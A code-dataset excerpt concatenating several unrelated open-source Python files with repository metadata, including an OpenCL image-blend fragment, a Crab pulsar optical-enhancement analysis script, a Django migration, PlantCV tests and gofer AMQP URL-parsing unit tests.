self.width, self.height = self.input(0).size
self.devOutBuffer = cl.Image(self.engine.ctx, self.engine.mf.READ_WRITE, self.image_format, shape=(self.width, self.height))
sampler = cl.Sampler(self.engine.ctx,
True, # Normalized coordinates
cl.addressing_mode.CLAMP_TO_EDGE,
cl.filter_mode.LINEAR)
exec_evt = self.program.run_blend(self.engine.queue, self.size, None,
self.input(0).getOutDevBuffer(),
self.input(1).getOutDevBuffer(),
self.devOutBuffer,
sampler,
numpy.int32(self.width),
numpy.int32(self.height),
numpy.float32(self.parm("factor").evalAsFloat())
)
exec_evt.wait()
|
cinepost/Copperfield_FX
|
copper/cop/cop_comps.py
|
Python
|
unlicense
| 2,456 | 0.041938 |
"""Scikit Flow Estimators."""
# Copyright 2015-present The Scikit Flow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.learn.python.learn.estimators.base import TensorFlowEstimator, TensorFlowBaseTransformer
from tensorflow.contrib.learn.python.learn.estimators.linear import TensorFlowLinearClassifier
from tensorflow.contrib.learn.python.learn.estimators.linear import TensorFlowClassifier
from tensorflow.contrib.learn.python.learn.estimators.linear import TensorFlowLinearRegressor
from tensorflow.contrib.learn.python.learn.estimators.linear import TensorFlowRegressor
from tensorflow.contrib.learn.python.learn.estimators.dnn import TensorFlowDNNClassifier
from tensorflow.contrib.learn.python.learn.estimators.dnn import TensorFlowDNNRegressor
from tensorflow.contrib.learn.python.learn.estimators.rnn import TensorFlowRNNClassifier
from tensorflow.contrib.learn.python.learn.estimators.rnn import TensorFlowRNNRegressor
from tensorflow.contrib.learn.python.learn.estimators.autoencoder import TensorFlowDNNAutoencoder
from tensorflow.contrib.learn.python.learn.estimators.run_config import RunConfig
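# A minimal usage sketch (illustrative; assumes scikit-learn is available and
# follows the skflow-style API of the classes re-exported above):
#
#   from sklearn import datasets
#   iris = datasets.load_iris()
#   clf = TensorFlowDNNClassifier(hidden_units=[10, 20, 10], n_classes=3)
#   clf.fit(iris.data, iris.target)
#   predictions = clf.predict(iris.data)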
|
shishaochen/TensorFlow-0.8-Win
|
tensorflow/contrib/learn/python/learn/estimators/__init__.py
|
Python
|
apache-2.0
| 1,777 | 0.00619 |
from django import forms
from models import edi_address
class DocumentForm(forms.ModelForm):
docfile = forms.FileField()
class Meta:
model = edi_address
fields = ["docfile",]
|
codelab-mx/edi-translator
|
data_mining/forms.py
|
Python
|
gpl-3.0
| 193 | 0.036269 |
from matplotlib import rcParams, rc
from spuriousRadioProbRangeP1 import probsOfGRP
from util import mpfit
from util.fitFunctions import gaussian
import matplotlib.pyplot as plt
import numpy as np
import matplotlib
import scipy.stats
import tables
import scipy.special
def fitGauss(xdata,ydata,yerr,flatLine=False):
nBins=100
amplitude = .5*np.max(ydata)
x_offset = xdata[np.argmax(ydata)]
sigma = (np.max(xdata)-np.min(xdata))/10.
y_offset = 3.
fixed = [False]*4
if flatLine == True:
amplitude = 0
fixed[0:3] = [True]*3
params=[sigma, x_offset, amplitude, y_offset] # First guess at fit params
errs = yerr
errs[np.where(errs == 0.)] = 1.
quiet = True
parinfo = [ {'n':0,'value':params[0],'limits':[.0001, .1], 'limited':[True,True],'fixed':fixed[0],'parname':"Sigma",'error':0},
{'n':1,'value':params[1],'limits':[x_offset-sigma*3, x_offset+sigma*3],'limited':[True,True],'fixed':fixed[1],'parname':"x offset",'error':0},
{'n':2,'value':params[2],'limits':[.2*amplitude, 3.*amplitude],'limited':[True,True],'fixed':fixed[2],'parname':"Amplitude",'error':0},
{'n':3,'value':params[3],'limited':[False,False],'fixed':fixed[3],'parname':"y_offset",'error':0}]
fa = {'x':xdata,'y':ydata,'err':yerr}
m = mpfit.mpfit(gaussian, functkw=fa, parinfo=parinfo, maxiter=1000, quiet=quiet)
if m.status <= 0:
print m.status, m.errmsg
mpp = m.params #The fit params
mpperr = m.perror
for k,p in enumerate(mpp):
parinfo[k]['value'] = p
parinfo[k]['error'] = mpperr[k]
        #print parinfo[k]['parname'],p," +/- ",mpperr[k]
if k==0: sigma = p
if k==1: x_offset = p
if k==2: amplitude = p
if k==3: y_offset = p
fineXdata = np.linspace(np.min(xdata),np.max(xdata),100.)
gaussfit = y_offset + amplitude * np.exp( - (( xdata - x_offset)**2) / ( 2. * (sigma**2)))
fineGaussFit = y_offset + amplitude * np.exp( - (( fineXdata - x_offset)**2) / ( 2. * (sigma**2)))
resolution = np.abs(x_offset/(2.355*sigma))
return {'gaussfit':gaussfit,'resolution':resolution,'sigma':sigma,'x_offset':x_offset,'amplitude':amplitude,'y_offset':y_offset,'fineXdata':fineXdata,'fineGaussFit':fineGaussFit,'parinfo':parinfo}
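# A minimal self-test sketch for fitGauss (kept commented out so it does not run
# with the analysis below; the synthetic gaussian parameters are arbitrary):
#
#   xs = np.linspace(0.38, 0.42, 30)
#   ys = 3. + 2. * np.exp(-(xs - 0.40)**2 / (2. * 0.005**2))
#   fitDict = fitGauss(xdata=xs, ydata=ys, yerr=0.1 * np.ones(30))
#   print fitDict['x_offset'], fitDict['sigma'], fitDict['amplitude']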
# common setup for matplotlib
params = {'savefig.dpi': 300, # save figures to 300 dpi
'axes.labelsize': 14,
'lines.linewidth': 1.5,
'text.fontsize': 14,
'legend.fontsize': 14,
'xtick.labelsize': 14,
'ytick.major.pad': 6,
'xtick.major.pad': 6,
'ytick.labelsize': 14}
# use of Sans Serif also in math mode
rc('text.latex', preamble='\usepackage{sfmath}')
rcParams.update(params)
phaseShift = 1.-0.677001953125#found with findOpticalPeak.py
def align_yaxis(ax1, v1, ax2, v2):
"""
adjust ax2 ylimit so that v2 in ax2 is aligned to v1 in ax1
Taken from http://stackoverflow.com/questions/10481990/matplotlib-axis-with-two-scales-shared-origin
"""
_, y1 = ax1.transData.transform((0, v1))
_, y2 = ax2.transData.transform((0, v2))
inv = ax2.transData.inverted()
_, dy = inv.transform((0, 0)) - inv.transform((0, y1-y2))
miny, maxy = ax2.get_ylim()
ax2.set_ylim(miny+dy, maxy+dy)
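# e.g. align_yaxis(ax1, 0., ax2, 0.) shifts ax2 so that y=0 on both axes lands
# at the same screen height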
def indexToPhase(indices):
radioIndexOffset = 0.5#Guppi offset, found as shift in unrotated,rotated radio profiles
radioArrivalPhases = (indices+radioIndexOffset)/2048.+phaseShift
return radioArrivalPhases
def nSigma(pvalue):
return scipy.special.erfinv(pvalue)*np.sqrt(2.)
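# e.g. nSigma(0.682689) ~= 1.0 and nSigma(0.9973) ~= 3.0, mapping two-sided
# gaussian probabilities back to the familiar sigma levels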
np.seterr(divide='ignore')
np.set_printoptions(threshold=np.nan)
path = '/Scratch/dataProcessing/crabData2/'
nIdxToCheck = 81
nSigmaRadioCutoff = 3
nBins = 250
bUseFineIndexBins = False
bInterpulses = False
#dataFilePath = path+'indPulseProfiles_{}sigma_{}_{}phaseBins_swap.h5'.format(nSigmaRadioCutoff,nIdxToCheck,nBins)
dataFilePath = path+'indPulseProfiles_{}sigma_P1_KS.h5'.format(nSigmaRadioCutoff)
dataFile = tables.openFile(dataFilePath,mode='r')
radioMax = dataFile.root.radioMax.read()
counts = dataFile.root.counts.read()#-dataFile.root.skyCounts.read()
giantPulseNumbers = dataFile.root.giantPulseNumbers.read()
pulseNumberTable = dataFile.root.pulseNumberTable.read()
giantPulseNumberMask = dataFile.root.giantPulseNumberMask.read()
idxOffsets = dataFile.root.idxOffsets.read()
indProfiles = dataFile.root.indProfiles.read()
radioIndices = dataFile.root.radioIndices.read()
overlapPNs = np.load('overlapP1.npz')['overlap']
mainPulseMask = np.logical_not(np.in1d(giantPulseNumbers,overlapPNs))
#mainPulseMask = np.logical_not(mainPulseMask)
radioMax = radioMax[mainPulseMask]
counts = counts[mainPulseMask]
giantPulseNumbers = giantPulseNumbers[mainPulseMask]
pulseNumberTable = pulseNumberTable[mainPulseMask]
giantPulseNumberMask = giantPulseNumberMask[mainPulseMask]
indProfiles = indProfiles[mainPulseMask]
radioIndices = radioIndices[mainPulseMask]
#radioIndexBins=np.array([1369,1371,1373,1375,1378,1381,1385,1389,1395])-.5
#radioIndexBinsFine = np.arange(1369,1396)-.5
radioIndexBins = np.arange(143,179,1)-.5
radioIndexBinsFine = np.arange(143,179)-.5
if bUseFineIndexBins == True:#For statistical test, use fine binning, for figure, use coarse
radioIndexBins = radioIndexBinsFine
startRadioIndex = radioIndexBins[0]
endRadioIndex = radioIndexBins[-1]
probDict = probsOfGRP(startPeakIndex=startRadioIndex,endPeakIndex=endRadioIndex)
probPhaseBins = probDict['radioPhaseBins']
probPeakDist = probDict['peakDist']
#a mask for less good data, during bright or dim times
dimMask = np.ones(len(counts))
idx0 = np.searchsorted(idxOffsets,0)
dimMask[counts[:,idx0]==0]=0
lineCounts = np.mean(counts,axis=1)
meanLineCounts = np.mean(lineCounts[lineCounts!=0])
stdLineCounts = np.std(lineCounts[lineCounts!=0])
stdPercentCutoff=0.
upperCutoff = scipy.stats.scoreatpercentile(lineCounts,100.-stdPercentCutoff)
lowerCutoff = scipy.stats.scoreatpercentile(lineCounts,stdPercentCutoff)
dimMask[lineCounts>upperCutoff] = 0
dimMask[lineCounts<lowerCutoff] = 0
dimMask = (dimMask==1)
radioStrength = radioMax
indProfilesMask = np.tile(giantPulseNumberMask,(np.shape(indProfiles)[2],1,1))
indProfilesMask = np.swapaxes(indProfilesMask,0,2)
indProfilesMask = np.swapaxes(indProfilesMask,0,1)
indProfilesMasked = np.ma.array(indProfiles,mask=indProfilesMask)
nIdxOffsets = len(idxOffsets)
#sum over GRP index, to get number of nonzero pulses in each index
# this will be used to scale later
nPulsesPerIdx = np.array(np.sum(giantPulseNumberMask,axis=0),dtype=np.double).reshape((-1,1))
cmap = matplotlib.cm.jet
histStart = 0.
histEnd = 1.
nBins=np.shape(indProfiles)[2]
_,phaseBinEdges = np.histogram(np.array([0]),range=(histStart,histEnd),bins=nBins)
phaseBinEdges+=phaseShift
phaseBinCenters = phaseBinEdges[0:-1]+np.diff(phaseBinEdges)/2.
grpProfile = np.ma.mean(indProfilesMasked.data[:,idx0],axis=0)
peakIdx = np.argmax(grpProfile)
peakBins = range(peakIdx-1,peakIdx+2)
print 'opticalPeakPhaseBins',peakBins
nRadioBins=15
radioStrengthCutoff = .155#0.155
radioCutoffMask = radioStrength >= radioStrengthCutoff
strongMask = np.logical_and(radioCutoffMask,dimMask)
#finalMask = np.logical_and(strongMask,radioPeakMask)
radioPhaseMask = np.logical_and(radioIndices >= 143,radioIndices <= 178)
#radioPhaseMask = np.logical_and(radioIndices >= np.min(radioIndices),radioIndices <= np.max(radioIndices))
finalMask = np.logical_and(strongMask,radioPhaseMask)
print 'GRP above',radioStrengthCutoff,':',np.sum(finalMask),'and in phase range'
#counts color plot
fig = plt.figure()
ax = fig.add_subplot(111)
handleMatshow = ax.matshow(counts[finalMask])
ax.set_aspect(1.0*np.shape(counts[finalMask])[1]/np.shape(counts[finalMask])[0])
fig.colorbar(handleMatshow)
overallCoincidentProfile = np.mean(indProfiles[finalMask,idx0,:],axis=0)
surroundingProfiles = np.ma.mean(indProfilesMasked[finalMask,:],axis=0)
avgProfile = np.ma.mean(surroundingProfiles,axis=0)
minProfileIndex = np.argmin(avgProfile)
#for the sky level take an average over the 6 points at the lowest part of the period
skyLevel = np.mean(avgProfile[minProfileIndex-3:minProfileIndex+3])
avgProfileErrors = np.ma.std(surroundingProfiles,axis=0)/np.sqrt(nIdxOffsets)#std over iIdxOffset /sqrt(N) to get error in avgProfile
#add errors in quadrature
skySigma = np.sqrt(np.sum(avgProfileErrors[minProfileIndex-3:minProfileIndex+3]**2.))
#should check error in sky level at some point
print 'sky level',skyLevel,'+/-',skySigma
overallCoincidentProfile-=skyLevel
surroundingProfiles-=skyLevel
avgProfile-=skyLevel
indProfiles-=skyLevel
avgOverallProfile = avgProfile
stdProfile = np.ma.std(surroundingProfiles,axis=0)#std over iIdxOffset
stdProfile = np.sqrt(stdProfile**2+skySigma**2)
avgStdProfile = stdProfile/np.sqrt(nIdxOffsets-1)
giantPeakHeight = np.sum(overallCoincidentProfile[peakBins])
peakHeight = np.sum(avgProfile[peakBins])
peakSigma = np.sqrt(np.sum(stdProfile[peakBins]**2))
overallEnhancement = (giantPeakHeight-peakHeight)/peakHeight
enhancementNSigma = (giantPeakHeight-peakHeight)/peakSigma
enhancementError = peakSigma/peakHeight
overallEnhancementError = enhancementError
print 'peak enhancement of avg above',radioStrengthCutoff,':',overallEnhancement,'+/-',enhancementError,'(',enhancementNSigma,' sigma)'
overallPeakHeight = np.array(peakHeight)
allProfiles = np.array(surroundingProfiles.data)
allProfiles[idx0]=overallCoincidentProfile#add back in since it was masked and zeroed earlier
allPeakHeights = np.sum(allProfiles[:,peakBins],axis=1)
peakPercentDifferenceByIdxOffset = (allPeakHeights-peakHeight)/peakHeight
nSigmaByIdxOffset = (allPeakHeights-peakHeight)/peakSigma
#significance figure
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(idxOffsets,np.abs(nSigmaByIdxOffset),'k')
ax.set_ylabel('Standard Deviations of Peak Height from Average Peak')
ax.set_xlabel('Pulse Offset Relative to GRP (number of periods)')
ax.set_ylim((0,4.5))
np.savez('sigP1.npz',idxOffsets=idxOffsets,nSigmaByIdxOffset=nSigmaByIdxOffset)
giantPeakHeights = np.sum(indProfiles[:,idx0,peakBins][finalMask],axis=1)
peakHeights = np.sum(indProfiles[:,:,peakBins][finalMask],axis=2)
#index peakHeights[iGRP,iIdxOffset]
maskedPeakHeights = np.ma.array(peakHeights,mask=giantPulseNumberMask[finalMask])
avgPeakHeights = np.ma.mean(maskedPeakHeights,axis=1)#average over iIdxOffset i.e. average of surrounding pulses for each iGRP
opticalEnhancementGRP = (giantPeakHeights-avgPeakHeights)/avgPeakHeights
opticalEnhancement = (avgPeakHeights-overallPeakHeight)/overallPeakHeight
radioProfile = np.loadtxt(path+'radio/RadioProfile_LyneDM_TZRCorrect_withGUPPIdelay.txt',skiprows=1,usecols=[3])
nRadioPhaseBins = len(radioProfile)
radioProfilePhaseBins = (1.*np.arange(nRadioPhaseBins)+.5)/nRadioPhaseBins
radioProfilePhaseBins+=phaseShift
fig = plt.figure()
ax = fig.add_subplot(111)
ax2 = ax.twinx()
pltHandle2 = ax2.plot(radioProfilePhaseBins,radioProfile,c=(.4,.5,.8),label='Radio Pulse')
pltHandle0 = ax.errorbar(phaseBinCenters,overallCoincidentProfile,yerr=stdProfile,c='k',label='Optical GRP-coincident Pulse')
pltHandle1 = ax.plot(phaseBinCenters,avgProfile,c='r',label='Optical non-GRP-coincident Pulse')
pltHandles = [pltHandle0,pltHandle1[0],pltHandle2[0]]
pltLabels = [pltHandle.get_label() for pltHandle in pltHandles]
box = ax.get_position()
ax.set_position([box.x0, box.y0 + box.height * 0.15,
box.width, box.height * 0.85])
ax2.set_position([box.x0, box.y0 + box.height * 0.15,
box.width, box.height * 0.85])
ax.set_ylim((0.055,.081))
ax2.set_ylim((.11,.155))
ax.set_xlim((0.97,1.005))
locator = matplotlib.ticker.MultipleLocator(.01)
ax2.yaxis.set_major_locator(locator)
ax.legend(pltHandles,pltLabels,loc='upper center', bbox_to_anchor=(0.5, -0.1),
fancybox=True, shadow=True, ncol=2)
ax.set_ylabel('Optical Counts per Period per Pixel')
ax.set_xlabel('Phase')
ax2.set_ylabel('Normalized Radio Intensity')
#enhanced profile figure
#fig = plt.figure(figsize=(1.8,2))
ax = fig.add_subplot(2,2,1)
#ax = fig.add_axes([0.,.6,.4,.4])
doublePhaseBins = np.concatenate([phaseBinCenters-1,phaseBinCenters,1+phaseBinCenters])
doubleOverallCoincidentProfile = np.concatenate([overallCoincidentProfile,overallCoincidentProfile,overallCoincidentProfile])
doubleStdProfile = np.concatenate([stdProfile,stdProfile,stdProfile])
doubleAvgProfile = np.concatenate([avgProfile,avgProfile,avgProfile])
doubleRadioProfilePhaseBins = np.concatenate([radioProfilePhaseBins-1,radioProfilePhaseBins,1+radioProfilePhaseBins])
doubleRadioProfile = np.concatenate([radioProfile,radioProfile,radioProfile])
ax2 = ax.twinx()
pltHandle2 = ax2.plot(doubleRadioProfilePhaseBins,doubleRadioProfile,c=(.4,.5,.8),label='Radio Pulse')
pltHandle0 = ax.plot(doublePhaseBins,doubleOverallCoincidentProfile,c='k',label='Optical GRP-coincident Pulse')
pltHandle1 = ax.plot(doublePhaseBins,doubleAvgProfile,c='r',label='Optical non-GRP-coincident Pulse')
pltHandles = [pltHandle0[0],pltHandle1[0],pltHandle2[0]]
pltLabels = [pltHandle.get_label() for pltHandle in pltHandles]
#rect = plt.Rectangle((.970,0.055),1.005-.970,.081-0.055,edgecolor='green',fill=True,linewidth=2.)
#ax.add_patch(rect)
ax.yaxis.set_visible(False)
ax2.yaxis.set_visible(False)
ax.set_ylim((-.005,.081))
ax2.set_ylim((-.01,.155))
ax.set_xlim((0.01,1.99))
ax.set_xlabel('Phase')
#ax.xaxis.label.set_size(14)
#ax.tick_params(axis='both', which='major', labelsize=12)
#ax2.tick_params(axis='both', which='major', labelsize=12)
box = ax.get_position()
ax.set_position([box.x0, box.y0 + box.height * 0.3,
box.width*.8, box.height * 0.7])
ax2.set_position([box.x0, box.y0 + box.height * 0.3,
box.width*.8, box.height * 0.7])
radioProfile = radioProfile*np.max(overallCoincidentProfile)/np.max(radioProfile)
#Now plot optical enhancement vs radio arrival time
radioPhases = indexToPhase(radioIndices)
radioPhaseBins = indexToPhase(radioIndexBins)
radioPhaseBinCenters = radioPhaseBins[0:-1]+np.diff(radioPhaseBins)/2.
print 'radioIndexBins',radioIndexBins,np.diff(radioIndexBins)
print 'radioPhaseBinEdges',radioPhaseBins,np.diff(radioPhaseBins)
radioBinned = np.digitize(radioPhases,bins=radioPhaseBins)
enhancements = []
enhancementNSigmas = []
enhancementNSigmasOverOverall = []
enhancementErrors = []
globalEnhancements = []
globalEnhancementErrors = []
#non-GRP pulse enhancements
profiles = []
radioStrengthCutoff = .155#0.155
radioCutoffMask = radioStrength >= radioStrengthCutoff
strongMask = np.logical_and(radioCutoffMask,dimMask)
strongMask = np.logical_and(strongMask,radioPhaseMask)
for iBin,bin in enumerate(radioPhaseBins[0:-1]):
binMask = np.logical_and(radioBinned==(iBin+1),strongMask)
binProfile = np.mean(indProfiles[binMask,idx0,:],axis=0)
profiles.append(binProfile)
phasesInBin = radioPhases[binMask]
surroundingProfiles = np.ma.mean(indProfilesMasked[binMask,:],axis=0)
avgProfile = np.ma.mean(surroundingProfiles,axis=0)
stdProfile = np.ma.std(surroundingProfiles,axis=0)#std over iIdxOffset
nSurroundingProfiles=np.sum(np.logical_not(surroundingProfiles.mask),axis=0)
errorAvgProfile = np.divide(stdProfile,np.sqrt(nSurroundingProfiles))
giantPeakHeight = np.sum(binProfile[peakBins])
peakHeight = np.sum(avgProfile[peakBins])
peakSigma = np.sqrt(np.sum(stdProfile[peakBins]**2))
enhancement = (giantPeakHeight-peakHeight)/peakHeight
enhancementNSigma = (giantPeakHeight-peakHeight)/peakSigma
enhancementError = peakSigma/peakHeight
enhancements.append(enhancement)
enhancementNSigmas.append(enhancementNSigma)
enhancementErrors.append(enhancementError)
nSigmaOverOverall=(enhancement-overallEnhancement)/enhancementError
enhancementNSigmasOverOverall.append(nSigmaOverOverall)
#print '{:.3}+/-{:.3}({:.3},{:.3})'.format(enhancement,enhancementError,enhancementNSigma,(enhancement-overallEnhancement)/enhancementError)
print '{}\t{:.5}\t{}\t{:.3}\t{:.3}\t{:.3}'.format(radioIndexBins[iBin],bin,np.sum(binMask),enhancement,enhancementError,nSigmaOverOverall)
globalEnhancement = (giantPeakHeight-overallPeakHeight)/overallPeakHeight
globalEnhancementError = peakSigma/overallPeakHeight
globalEnhancements.append(globalEnhancement)
globalEnhancementErrors.append(globalEnhancementError)
nonGRPEnhancement = (peakHeight-overallPeakHeight)/overallPeakHeight
nonGRPPeakSigma = np.sqrt(np.sum(errorAvgProfile[peakBins])**2)
nonGRPEnhancementNSigma = (peakHeight-overallPeakHeight)/nonGRPPeakSigma
nonGRPEnhancementError = nonGRPPeakSigma/overallPeakHeight
#print 'nonGRP {:.3}+/-{:.3}({:.3})'.format(nonGRPEnhancement,nonGRPEnhancementError,nonGRPEnhancementNSigma)
nextBin = radioPhaseBins[iBin+1]
#ax.plot(phaseBinEdges[0:-1],binProfile-avgProfile,c=color,label='{:.3}-{:.3}'.format(bin,nextBin))
#ax2.errorbar(phaseBinEdges[0:-1],binProfile,yerr=stdProfile,c=color,label='{:.3}-{:.3}'.format(bin,nextBin))
#ax3.errorbar(phaseBinEdges[0:-1],avgProfile,yerr=errorAvgProfile,c=color,label='{:.3}-{:.3}'.format(bin,nextBin))
enhancements = np.array(enhancements)
enhancementErrors = np.array(enhancementErrors)
percentEnhancements = 100.*enhancements
percentEnhancementErrors = 100.*enhancementErrors
fig = plt.figure(figsize=(8.,6.))
#ax = fig.add_subplot(211)
ax = fig.add_axes([.15,.6,.8,.3])
#ax.step(radioIndexBins[0:-1],noiseDist,'g',label='noise detections')
ax.plot(probPhaseBins,np.append(probPeakDist,probPeakDist[-1]),'k',drawstyle='steps-post',label='GRP+noise detections')
ax.set_ylabel('Number of\nGRPs detected')
ax.xaxis.set_visible(False)
ax.xaxis.set_ticks([])
#ax.step(radioIndexBins[0:-1],peakDist,'k',label='GRP+noise detections')
#fig = plt.figure()
#ax = fig.add_subplot(212)
ax2 = fig.add_axes([.15,.1,.8,.5])
#ax.errorbar(radioPhaseBinCenters,100.*enhancements,yerr=100.*enhancementErrors,marker='.',color='k',label='enhancement relative to surrounding nonGRP',linestyle='.')
ax2.errorbar(radioPhaseBinCenters,percentEnhancements,yerr=percentEnhancementErrors,linestyle='.',color='k')
ax2.plot(radioPhaseBins,np.append(percentEnhancements,percentEnhancements[-1]),'k',drawstyle='steps-post',label='enhancement relative to surrounding nonGRP')
opticalPeakPhase = 0.993998046875
ax2.axhline(0.,linewidth=1.,c='k')
ax2.axvline(opticalPeakPhase,c='gray',linestyle='--')
ax2.set_xlabel('GRP Arrival Phase')
ax2.set_ylabel('Optical Enhancement of\nGRP-Coincident Pulses (%)')
ax2.set_xlim((.392,.411))
ax.set_xlim((.392,.411))
fig.text(.175,.85,'(a)',size=16)
ax2.yaxis.get_major_ticks()[-1].label1.set_visible(False)
fig.text(.175,.55,'(b)',size=16)
#ax2.legend(loc='lower left')
fig = plt.figure()
ax = fig.add_subplot(111)
#ax.errorbar(radioPhaseBinCenters,100.*enhancements,yerr=100.*enhancementErrors,marker='.',color='k',label='enhancement relative to surrounding nonGRP',linestyle='.')
ax.errorbar(radioPhaseBinCenters,percentEnhancements,yerr=percentEnhancementErrors,linestyle='.',color='k')
ax.plot(radioPhaseBins,np.append(percentEnhancements,percentEnhancements[-1]),'k',drawstyle='steps-post',label='enhancement relative to surrounding nonGRP')
radioPhaseBinWidths = np.diff(radioPhaseBins)
meanPercentEnhancement = np.average(percentEnhancements,weights = 1/percentEnhancementErrors**2)
errorMeanPercentEnhancement = 1./np.sqrt(np.sum(1/percentEnhancementErrors**2))
print 'weighted average enhancement (%):',meanPercentEnhancement,'+/-',errorMeanPercentEnhancement
chi2=np.sum((percentEnhancements-meanPercentEnhancement)**2/percentEnhancementErrors**2)
dof=len(percentEnhancements)-1 #free parameter: meanEnhancement
pvalue=1-scipy.stats.chi2.cdf(chi2,dof)
print 'flat line: chi2 dof pvalue significance',chi2,dof,pvalue,nSigma(1-pvalue),'sigmas'
gaussDict = fitGauss(xdata=radioPhaseBinCenters,ydata=percentEnhancements,yerr=percentEnhancementErrors)
fit = gaussDict['gaussfit']
ax.plot(radioPhaseBinCenters,fit)
ax.plot(gaussDict['fineXdata'],gaussDict['fineGaussFit'])
chi2Fit=np.sum((percentEnhancements-fit)**2/percentEnhancementErrors**2)
dofFit=len(percentEnhancements)-4 #free parameters:y_offset,x_offset,amplitude,sigma
pvalueFit=1-scipy.stats.chi2.cdf(chi2Fit,dofFit)
print 'gaussian: chi2 dof pvalue significance',chi2Fit,dofFit,pvalueFit,nSigma(1-pvalueFit),'sigmas'
print gaussDict['parinfo']
flatLineDict = fitGauss(xdata=radioPhaseBinCenters,ydata=percentEnhancements,yerr=percentEnhancementErrors,flatLine=True)
fit = flatLineDict['gaussfit']
ax.plot(radioPhaseBinCenters,fit)
ax.plot(flatLineDict['fineXdata'],flatLineDict['fineGaussFit'])
chi2=np.sum((percentEnhancements-fit)**2/percentEnhancementErrors**2)
dof=len(percentEnhancements)-1 #free parameters:y_offset
pvalue=1-scipy.stats.chi2.cdf(chi2,dof)
print 'flatLine: chi2 dof pvalue significance',chi2,dof,pvalue,nSigma(1-pvalue),'sigmas'
print flatLineDict['parinfo']
chi2Diff = chi2-chi2Fit
dofDiff = dof-dofFit
pvalueDiff=1-scipy.stats.chi2.cdf(chi2Diff,dofDiff)
print 'diff: chi2 dof pvalue significance',chi2Diff,dofDiff,pvalueDiff,nSigma(1-pvalueDiff),'sigmas'
plt.show()
|
bmazin/ARCONS-pipeline
|
examples/Pal2012-crab/enhancementPhaseP1.py
|
Python
|
gpl-2.0
| 21,133 | 0.022903 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('main', '0019_auto_20170521_1332'),
]
operations = [
migrations.CreateModel(
name='RecentActivity',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('timestamp', models.DateTimeField()),
('type', models.CharField(max_length=255, choices=[(b'follow', b'Followers/Subscribers'), (b'support', b'Recurring Support')])),
('data', models.TextField()),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
),
]
|
google/mirandum
|
alerts/main/migrations/0020_recentactivity.py
|
Python
|
apache-2.0
| 895 | 0.002235 |
import pytest
import cv2
from plantcv.plantcv.visualize import auto_threshold_methods
def test_auto_threshold_methods_bad_input(visualize_test_data):
"""Test for PlantCV."""
img = cv2.imread(visualize_test_data.small_rgb_img)
with pytest.raises(RuntimeError):
_ = auto_threshold_methods(gray_img=img)
def test_auto_threshold_methods(visualize_test_data):
"""Test for PlantCV."""
img = cv2.imread(visualize_test_data.small_gray_img, -1)
labeled_imgs = auto_threshold_methods(gray_img=img)
assert len(labeled_imgs) == 5
|
danforthcenter/plantcv
|
tests/plantcv/visualize/test_auto_threshold_methods.py
|
Python
|
mit
| 558 | 0 |
# Copyright (c) 2014 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public
# License as published by the Free Software Foundation; either version
# 2 of the License (GPLv2) or (at your option) any later version.
# There is NO WARRANTY for this software, express or implied,
# including the implied warranties of MERCHANTABILITY,
# NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. You should
# have received a copy of GPLv2 along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
from unittest import TestCase
from gofer.messaging.adapter.url import URL
from gofer.messaging.adapter.url import PORT, Scheme
class Test(object):
def __init__(self,
url,
adapter=None,
scheme=None,
host=None,
port=None,
userid=None,
password=None,
path=None):
self.url = url
self.adapter = adapter
self.scheme = scheme
self.host = host
self.port = port
self.userid = userid
self.password = password
self.path = path
def __call__(self, test):
url = URL(self.url)
test.assertEqual(url.adapter, self.adapter)
test.assertEqual(url.scheme, self.scheme)
test.assertEqual(url.host, self.host)
test.assertEqual(url.port, self.port)
test.assertEqual(url.userid, self.userid)
test.assertEqual(url.password, self.password)
test.assertEqual(url.path, self.path)
TESTS = [
Test('qpid+amqp://elmer:fudd@blue:5000/all',
adapter='qpid',
scheme='amqp',
host='blue',
port=5000,
userid='elmer',
password='fudd',
path='all'),
Test('amqp://elmer:fudd@yellow:1234//',
scheme='amqp',
host='yellow',
port=1234,
userid='elmer',
password='fudd',
path='/'),
Test('amqp://green:5678/all/good',
scheme='amqp',
host='green',
port=5678,
path='all/good'),
Test('amqp://red:2323',
scheme='amqp',
host='red',
port=2323),
Test('amqp://black',
scheme='amqp',
host='black',
port=5672),
Test('amqps://purple',
scheme='amqps',
host='purple',
port=5671),
Test('orange:6545',
scheme='amqp',
host='orange',
port=6545),
Test('localhost',
scheme='amqp',
host='localhost',
port=5672),
Test('',
scheme='amqp',
port=5672),
]
class TestURL(TestCase):
def test_parsing(self):
for test in TESTS:
test(self)
def test_canonical(self):
urls = [
'qpid+amqp://elmer:fudd@test-host:5000/all',
'amqp://elmer:fudd@test-host:5000/all',
'amqp://test-host:5000/all',
'amqp://test-host:5000'
]
for _url in urls:
url = URL(_url)
self.assertEqual(url.canonical, _url.split('+')[-1].rsplit('/all')[0])
def test_is_ssl(self):
# false
url = URL('amqp://localhost')
self.assertFalse(url.is_ssl())
# true
url = URL('amqps://localhost')
self.assertTrue(url.is_ssl())
def test_hash(self):
url = URL('test')
self.assertEqual(hash(url), hash(url.canonical))
def test_str(self):
urls = [
'qpid+amqp://elmer:fudd@test-host:5000/all',
'amqp://elmer:fudd@test-host:5000/all',
'amqp://test-host:5000/all',
'amqp://test-host:5000',
'amqp://test-host',
]
for _url in urls:
url = URL(_url)
self.assertEqual(str(url), url.canonical)
class TestScheme(TestCase):
def test_validated(self):
for n in PORT:
self.assertEqual(Scheme.validated(n), n.lower())
self.assertRaises(ValueError, Scheme.validated, 'unsupported')
|
jortel/gofer
|
test/unit/messaging/adapter/test_url.py
|
Python
|
